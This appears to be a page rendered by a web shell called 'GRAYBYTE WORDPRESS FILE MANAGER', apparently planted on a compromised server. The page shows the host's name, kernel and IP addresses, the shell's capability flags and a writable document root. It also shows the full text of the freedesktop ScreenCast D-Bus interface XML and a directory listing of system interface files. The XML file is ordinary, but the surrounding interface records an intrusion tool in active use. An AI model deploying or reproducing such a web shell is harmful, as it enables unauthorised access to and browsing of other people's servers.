✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server.blackpussy.asia ​🇻​♯➤ 5.14.0-611.20.1.el9_7.x86_64 #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 163.245.207.76 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗞 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ mail,mb_send_mail
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/share/dbus-1/interfaces//org.freedesktop.portal.ScreenCast.xml
<?xml version="1.0"?>
<!--
 Copyright (C) 2017-2018 Red Hat, Inc.

 This library is free software; you can redistribute it and/or
 modify it under the terms of the GNU Lesser General Public
 License as published by the Free Software Foundation; either
 version 2 of the License, or (at your option) any later version.

 This library is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 Lesser General Public License for more details.

 You should have received a copy of the GNU Lesser General Public
 License along with this library. If not, see <http://www.gnu.org/licenses/>.
-->

<node name="/" xmlns:doc="http://www.freedesktop.org/dbus/1.0/doc.dtd">
  <!--
      org.freedesktop.portal.ScreenCast:
      @short_description: Screen cast portal

      The Screen cast portal allows to create screen cast sessions.

      This documentation describes version 4 of this interface.
  -->
  <interface name="org.freedesktop.portal.ScreenCast">
    <!--
        CreateSession:
        @options: Vardict with optional further information
        @handle: Object path for the #org.freedesktop.portal.Request object representing this call

        Create a screen cast session. A successfully created session can at
        any time be closed using org.freedesktop.portal.Session::Close, or may
        at any time be closed by the portal implementation, which will be
        signalled via org.freedesktop.portal.Session::Closed.

        Supported keys in the @options vardict include:
        <variablelist>
          <varlistentry>
            <term>handle_token s</term>
            <listitem><para>
              A string that will be used as the last element of the @handle. Must be a valid
              object path element. See the #org.freedesktop.portal.Request documentation for
              more information about the @handle.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>session_handle_token s</term>
            <listitem><para>
              A string that will be used as the last element of the session handle. Must be a valid
              object path element. See the #org.freedesktop.portal.Session documentation for
              more information about the session handle.
            </para></listitem>
          </varlistentry>
        </variablelist>

        The following results get returned via the #org.freedesktop.portal.Request::Response signal:
        <variablelist>
          <varlistentry>
            <term>session_handle o</term>
            <listitem><para>
              The session handle. An object path for the
              #org.freedesktop.portal.Session object representing the created
              session.
            </para></listitem>
          </varlistentry>
        </variablelist>
    -->
    <method name="CreateSession">
      <arg type="a{sv}" name="options" direction="in"/>
      <arg type="o" name="handle" direction="out"/>
    </method>
    <!--
        SelectSources:
        @session_handle: Object path for the #org.freedesktop.portal.Session object
        @options: Vardict with optional further information
        @handle: Object path for the #org.freedesktop.portal.Request object representing this call

        Configure what the screen cast session should record. This method must
        be called before starting the session.

        Passing invalid input to this method will cause the session to be
        closed. An application may only attempt to select sources once per
        session.

        Supported keys in the @options vardict include:
        <variablelist>
          <varlistentry>
            <term>handle_token s</term>
            <listitem><para>
              A string that will be used as the last element of the @handle. Must be a valid
              object path element. See the #org.freedesktop.portal.Request documentation for
              more information about the @handle.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>types u</term>
            <listitem><para>
              Bitmask of what types of content to record. Default is MONITOR.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>multiple b</term>
            <listitem><para>
              Whether to allow selecting multiple sources. Default is no.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>cursor_mode u</term>
            <listitem><para>
              Determines how the cursor will be drawn in the screen cast stream. It must be
              one of the curosr modes advertised in
              #org.freedesktop.portal.ScreenCast.AvailableCursorModes. Setting a cursor mode
              not advertised will cause the screen cast session to be closed. The default
              cursor mode is 'Hidden'.

              This option was added in version 2 of this interface.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>restore_token s</term>
            <listitem><para>
              The token to restore a previous session.

              If the stored session cannot be restored, this value is ignored
              and the user will be prompted normally. This may happen when, for
              example, the session contains a monitor or a window that is not
              available anymore, or when the stored permissions are withdrawn.

              The restore token is invalidated after using it once. To restore
              the same session again, use the new restore token sent in response
              to starting this session.

              This option was added in version 4 of this interface.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>persist_mode u</term>
            <listitem><para>
              How this session should persist. Default is 0. Accepted values are:

              <simplelist>
                <member>0: Do not persist (default)</member>
                <member>1: Permissions persist as long as the application is running</member>
                <member>2: Permissions persist until explicitly revoked</member>
              </simplelist>

              Remote desktop screen cast sessions cannot persist. The only allowed
              persist_mode for remote desktop sessions is 0.

              If the permission for the session to persist is granted, a restore token will
              be returned via the #org.freedesktop.portal.Request::Response signal of the
              #org.freedesktop.portal.ScreenCast.Start method.

              This option was added in version 4 of this interface.
            </para></listitem>
          </varlistentry>
        </variablelist>

        For available source types, see the AvailableSourceTypes property.
    -->
    <method name="SelectSources">
      <arg type="o" name="session_handle" direction="in"/>
      <arg type="a{sv}" name="options" direction="in"/>
      <arg type="o" name="handle" direction="out"/>
    </method>
    <!--
        Start:
        @session_handle: Object path for the #org.freedesktop.portal.Session object
        @parent_window: Identifier for the application window, see <link linkend="parent_window">Common Conventions</link>
        @options: Vardict with optional further information
        @handle: Object path for the #org.freedesktop.portal.Request object representing this call

        Start the screen cast session. This will typically result the portal
        presenting a dialog letting the user do the selection set up by
        SelectSources. An application can only attempt start a session once.

        A screen cast session may only be started after having selected sources
        using org.freedesktop.portal.ScreenCast::SelectSources.

        Supported keys in the @options vardict include:
        <variablelist>
          <varlistentry>
            <term>handle_token s</term>
            <listitem><para>
              A string that will be used as the last element of the @handle. Must be a valid
              object path element. See the #org.freedesktop.portal.Request documentation for
              more information about the @handle.
            </para></listitem>
          </varlistentry>
        </variablelist>

        The following results get returned via the
        #org.freedesktop.portal.Request::Response signal:
        <variablelist>
          <varlistentry>
            <term>streams a(ua{sv})</term>
            <listitem><para>
              An array of PipeWire streams. Each stream consists of a PipeWire
              node ID (the first element in the tuple, and a Vardict of
              properties.

              The array will contain a single stream if 'multiple' (see
              SelectSources) was set to 'false', or at least one stream if
              'multiple' was set to 'true' as part of the SelectSources method.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>restore_token s</term>
            <listitem><para>
              The restore token. This token is a single use token that can later
              be used to restore a session. See
              #org.freedesktop.portal.ScreenCast.SelectSources for details.

              This response option was added in version 4 of this interface.
            </para></listitem>
          </varlistentry>
        </variablelist>

        Stream properties include:
        <variablelist>
          <varlistentry>
            <term>id s</term>
            <listitem><para>
              Opaque identifier. Will be unique for this stream and local to this
              session. Will persist with future sessions, if they are restored
              using a restore token. This property was added in version 4 of this
              interface. Optional.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>position (ii)</term>
            <listitem><para>
              A tuple consisting of the position (x, y) in the compositor
              coordinate space. Note that the position may not be equivalent to a
              position in a pixel coordinate space. Only available for monitor
              streams. Optional.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>size (ii)</term>
            <listitem><para>
              A tuple consisting of (width, height). The size represents the size
              of the stream as it is displayed in the compositor coordinate
              space. Note that this size may not be equivalent to a size in a
              pixel coordinate space. The size may differ from the size of the
              stream. Optional.
            </para></listitem>
          </varlistentry>
          <varlistentry>
            <term>source_type u</term>
            <listitem><para>
              The type of the content which is being screen casted.
              For available source types, see the AvailableSourceTypes property.
              This property was added in version 3 of this interface.
            </para></listitem>
          </varlistentry>
        </variablelist>
    -->
    <method name="Start">
      <arg type="o" name="session_handle" direction="in"/>
      <arg type="s" name="parent_window" direction="in"/>
      <arg type="a{sv}" name="options" direction="in"/>
      <arg type="o" name="handle" direction="out"/>
    </method>
    <!--
        OpenPipeWireRemote:
        @session_handle: Object path for the #org.freedesktop.portal.Session object
        @options: Vardict with optional further information
        @fd: File descriptor of an open PipeWire remote.

        Open a file descriptor to the PipeWire remote where the screen cast
        streams are available. The file descriptor should be used to create a
        <classname>pw_core</classname> object, by using
        <function>pw_context_connect_fd</function>. Only the screen cast stream
        nodes will be available from this PipeWire node.
    -->
    <method name="OpenPipeWireRemote">
      <annotation name="org.gtk.GDBus.C.Name" value="open_pipewire_remote"/>
      <annotation name="org.gtk.GDBus.C.UnixFD" value="true"/>
      <arg type="o" name="session_handle" direction="in"/>
      <arg type="a{sv}" name="options" direction="in"/>
      <arg type="h" name="fd" direction="out"/>
    </method>
    <!--
        AvailableSourceTypes:

        A bitmask of available source types. Currently defined types are:

        <simplelist>
          <member>1: MONITOR</member>
          <member>2: WINDOW</member>
          <member>4: VIRTUAL</member>
        </simplelist>
    -->
    <property name="AvailableSourceTypes" type="u" access="read"/>
    <!--
        AvailableCursorModes:

        A bitmask of available cursor modes.

        Available cursor mode values:
        <simplelist>
          <member>1: Hidden. The cursor is not part of the screen cast stream.</member>
          <member>2: Embedded: The cursor is embedded as part of the stream buffers.</member>
          <member>4: Metadata: The cursor is not part of the screen cast stream, but sent as PipeWire stream metadata.</member>
        </simplelist>

        This property was added in version 2 of this interface.
    -->
    <property name="AvailableCursorModes" type="u" access="read"/>
    <property name="version" type="u" access="read"/>
  </interface>
</node>

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
17 Jan 2026 3.22 PM
root / root
0755
org.freedesktop.Flatpak.Authenticator.xml
12.722 KB
17 Apr 2024 5.19 PM
root / root
0644
org.freedesktop.Flatpak.xml
12.512 KB
17 Apr 2024 5.19 PM
root / root
0644
org.freedesktop.LogControl1.xml
1.927 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.RealtimeKit1.xml
2.13 KB
2 Oct 2024 9.35 PM
root / root
0644
org.freedesktop.Tracker3.Miner.Files.Index.xml
0.406 KB
11 Jun 2021 10.53 PM
root / root
0644
org.freedesktop.Tracker3.Miner.xml
2.139 KB
11 Jun 2021 10.53 PM
root / root
0644
org.freedesktop.fwupd.xml
6.023 KB
13 Apr 2026 8.35 AM
root / root
0644
org.freedesktop.hostname1.xml
4.731 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.impl.portal.Access.xml
3.727 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.Account.xml
3.345 KB
16 Apr 2022 8.41 PM
root / root
0644
org.freedesktop.impl.portal.AppChooser.xml
5.081 KB
9 Nov 2021 12.40 AM
root / root
0644
org.freedesktop.impl.portal.Background.xml
3.986 KB
20 Feb 2020 6.56 PM
root / root
0644
org.freedesktop.impl.portal.Email.xml
3.463 KB
20 Feb 2020 6.56 PM
root / root
0644
org.freedesktop.impl.portal.FileChooser.xml
13.445 KB
18 Apr 2021 3.55 AM
root / root
0644
org.freedesktop.impl.portal.Inhibit.xml
5.315 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.Lockdown.xml
1.698 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.Notification.xml
2.816 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.PermissionStore.xml
6.913 KB
9 Nov 2021 12.40 AM
root / root
0644
org.freedesktop.impl.portal.Print.xml
5.963 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.RemoteDesktop.xml
13.523 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.Request.xml
1.673 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.ScreenCast.xml
12.214 KB
16 Apr 2022 8.41 PM
root / root
0644
org.freedesktop.impl.portal.Screenshot.xml
4.245 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.Secret.xml
2.564 KB
16 Apr 2022 8.41 PM
root / root
0644
org.freedesktop.impl.portal.Session.xml
1.691 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.impl.portal.Settings.xml
3.358 KB
9 Nov 2021 12.40 AM
root / root
0644
org.freedesktop.impl.portal.Wallpaper.xml
2.228 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.locale1.xml
2.506 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.login1.Manager.xml
16.598 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.login1.Seat.xml
2.42 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.login1.Session.xml
6.233 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.login1.User.xml
3.361 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.portal.Account.xml
3.456 KB
16 Apr 2022 8.41 PM
root / root
0644
org.freedesktop.portal.Background.xml
3.939 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Camera.xml
3.054 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Device.xml
2.569 KB
24 Jun 2022 2.25 PM
root / root
0644
org.freedesktop.portal.Documents.xml
11.155 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Email.xml
4.779 KB
20 Feb 2020 6.56 PM
root / root
0644
org.freedesktop.portal.FileChooser.xml
14.801 KB
9 Nov 2021 12.40 AM
root / root
0644
org.freedesktop.portal.FileTransfer.xml
5.525 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Flatpak.xml
22.175 KB
17 Apr 2024 5.19 PM
root / root
0644
org.freedesktop.portal.GameMode.xml
8.876 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Inhibit.xml
7.114 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Location.xml
6.237 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.MemoryMonitor.xml
2.021 KB
20 Feb 2020 6.56 PM
root / root
0644
org.freedesktop.portal.NetworkMonitor.xml
4.781 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.portal.Notification.xml
6.528 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.OpenURI.xml
7.746 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.PowerProfileMonitor.xml
1.669 KB
9 Nov 2021 12.40 AM
root / root
0644
org.freedesktop.portal.Print.xml
14.107 KB
9 Nov 2021 12.41 AM
root / root
0644
org.freedesktop.portal.ProxyResolver.xml
1.929 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.portal.Realtime.xml
2.473 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.RemoteDesktop.xml
15.761 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Request.xml
3.455 KB
12 Nov 2019 5.55 PM
root / root
0644
org.freedesktop.portal.ScreenCast.xml
13.374 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Screenshot.xml
4.619 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Secret.xml
3.208 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Session.xml
2.881 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.portal.Settings.xml
3.296 KB
9 Nov 2021 12.40 AM
root / root
0644
org.freedesktop.portal.Trash.xml
1.705 KB
16 Apr 2022 8.41 PM
root / root
0644
org.freedesktop.portal.Wallpaper.xml
3.455 KB
1 Aug 2022 9.40 PM
root / root
0644
org.freedesktop.systemd1.Automount.xml
17.314 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Device.xml
16.704 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Job.xml
2.203 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Manager.xml
35.329 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Mount.xml
57.278 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Path.xml
17.627 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Scope.xml
30.264 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Service.xml
63.951 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Slice.xml
28.354 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Socket.xml
63.877 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Swap.xml
56.201 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Target.xml
16.639 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Timer.xml
18.73 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.systemd1.Unit.xml
16.574 KB
25 Jun 2026 12.27 AM
root / root
0644
org.freedesktop.timedate1.xml
2.861 KB
25 Jun 2026 12.27 AM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF